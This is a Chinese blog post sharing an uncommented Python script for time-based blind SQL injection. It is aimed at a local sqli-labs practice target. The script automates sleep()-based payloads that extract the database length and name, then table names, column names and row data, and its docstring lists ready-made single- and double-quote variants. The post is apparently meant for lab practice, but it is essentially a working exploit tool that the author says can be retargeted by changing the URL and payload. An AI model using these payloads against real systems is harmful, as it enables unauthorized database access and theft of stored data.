首页 > 其他分享 >时间盲注脚本

时间盲注脚本

时间:2023-01-18 16:14:23浏览次数:33  
标签:脚本 name database datetime 时间 table 盲注 payload sleep

这个脚本是一个时间盲注小脚本,在sqli-labs中17关之前的只要把url改了用这个脚本基本都可以跑的出来,只是要注意闭合方式需要修改,把脚本中的payload更换一下就可以跑出结果来。随便写的就没有写注释了。

    #coding:utf-8
    import requests
    import datetime
    import time
    
    """
    k控制着limit
    i控制着substr
    j控制着所猜字符的ascii
    
    payload :
        单引号盲注:
            猜数据库长度:
            payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
            猜数据库名字:
            payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
            猜表名:
            payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
            猜列名:
            payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
            爆数据:
            payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column,table,k,i,j)
    
        双引号盲注:
            猜数据库长度:
            payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' %i
            猜数据库名字:
            payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i,j)
            猜表名:
            payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
            猜列名:
            payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
            爆数据:
            payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column,table,k,i,j)
    """
    
    url = 'http://192.168.1.6/sqli-labs/Less-10/index.php'
    
    
    def database_len():
        for i in range(1,15):
            
            payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' %i
            #payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
            time1 = datetime.datetime.now()
            r = requests.get(url+ payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 2:
                print(i)
            else:
                print(i)
                break
        print('database_len:',i)
        return i
    
    def database_name(len):
        name = ''
        for i in range(1,len+1):
            for j in '0123456789abcdefghijklmnopqrstuvwxyz':
                payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i,j)
                #payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
                time1 = datetime.datetime.now()
                r = requests.get(url + payload)
                time2 = datetime.datetime.now()
                sec = (time2 - time1).seconds
                if sec >=3:
                    name += j
                    print(name)
                    break
        print('database_name:',name)
    
    def table_name():
        name = ''
        for k in range(6):
            for i in range(10):
                for j in range(65,123):
                    payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
                    #payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
                    time1 = datetime.datetime.now()
                    r = requests.get(url+payload)
                    time2 = datetime.datetime.now()
                    sec = (time2-time1).seconds
                    if sec >= 3:
                        name += chr(j)
                        print(chr(j))
                        break
            print("table_name:",name)
            name = ''
    
    def colum_name(table_name):
        name = ''
        for k in range(6):
            for i in range(10):
                for j in range(65, 123):
                    payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
                    #payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
                    time1 = datetime.datetime.now()
                    r = requests.get(url+payload)
                    time2 = datetime.datetime.now()
                    sec = (time2-time1).seconds
                    if sec >= 3:
                        name += chr(j)
                        print(chr(j))
                        break
            print("column_name:", name)
            name = ''
    
    def data(column,table):
        name = ''
        for k in range(6):
            for i in range(1,10):
                for j in range(65,123):
                    payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column,table,k,i,j)
                    #payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column,table,k,i,j)
                    time1 = datetime.datetime.now()
                    r = requests.get(url+payload)
                    time2 = datetime.datetime.now()
                    sec = (time2-time1).seconds
                    if sec >= 2:
                        name += chr(j)
                        print(chr(j))
                        break
            print("data:", name)
            name = ''
    
    if __name__ == '__main__':
        len = database_len()
        database_name(len)
        table_name()
        colum_name('users')
        # data('username','users')

标签:脚本,name,database,datetime,时间,table,盲注,payload,sleep
From: https://www.cnblogs.com/qianyuzz/p/17060050.html

相关文章

  • Java8时间段分组
    根据统计的时间段进行分组,例如当天的时间段0点到6点、6点到12点,12点到18点的统计数量,这时候繁杂的for循环会导致代码量激增,切不够明了。我们可以用Java8的链式方式来进行分......
  • 第五章:时间和窗口
    1.ProcessFunction系列函数  2.窗口算子的使用  3.处理迟到数据 ......
  • mysql 格式化字符串时间查询
    select`r`.*from`table_aaa`as`r`leftjoin`table_bbb`as`m`on`r`.`idNo`=`m`.`me_no`where((CONVERT(r.money,DECIMAL(10,2))>=1)and(CONVERT(r.......
  • Shell脚本零基础入门
    文章目录1.shell脚本入门1.1.shell的简介1.2.shell的应用场景1.3.shell常见的解释器1.4.shell脚本文件权限与脚本执行2.shell的变量以及常见符号2.1.常见变量2.......
  • vm 正常运行一段时间卡死问题,软锁问题
    vm正常运行一段时间卡死问题,软锁问题rcu_schedself-detectedstallonCPU〔2}(t=68000jiffiesg=Z8681c=Z868Eq=105)最近vm虚拟机装的centos7总是正常运行一段时......
  • python datetime 计算时间差
    场景:数据存储需要已5分钟为单位存储,目前上报数据是0.5s上报一次目前能想到的逻辑是,已最后一次存储的时间拿出来,与获取的时间数据计算差值,大于等于300秒就入库只能想到这......
  • windows关机与重启bat脚本
    电脑设置每天定时关机1、同时按下Windows徽标键+R键,调出“运行”框;在“运行”框中输入命令control,并点击“确定”,即可打开控制面板2、打开控制面板后,右上角可以切换不同......
  • Jmeter元件BeanShell 取样器调用Java代码处理时间
    在测试过程中经常会遇到一些接口中的参数需要进行处理时间格式,比如当前时间、当前日期,当月一号,下个月一号等等,下面我们就使用Jmeter元件BeanShell取样器调用Java代码进行处......
  • pnpm : 无法加载文件 \AppData\Roaming\npm\pnpm.ps1,因为在此系统上禁止运行脚本
    1.安装pnpmnpminstall-gpnpm#安装pnpmpnpm--version#查看pnpm版本安装完成后查看版本时报错pnpm:无法加载文件C:\Users\123\AppData\Roaming\npm\pnpm.p......
  • 通过 Python 来调用 Shell 脚本的三种常用方式
    如何通过Python来调用Shell脚本本文介绍三种写法使用os.system来运行使用subprocess.run来运行使用subprocess.Popen来运行三种方式的优缺点os.syste......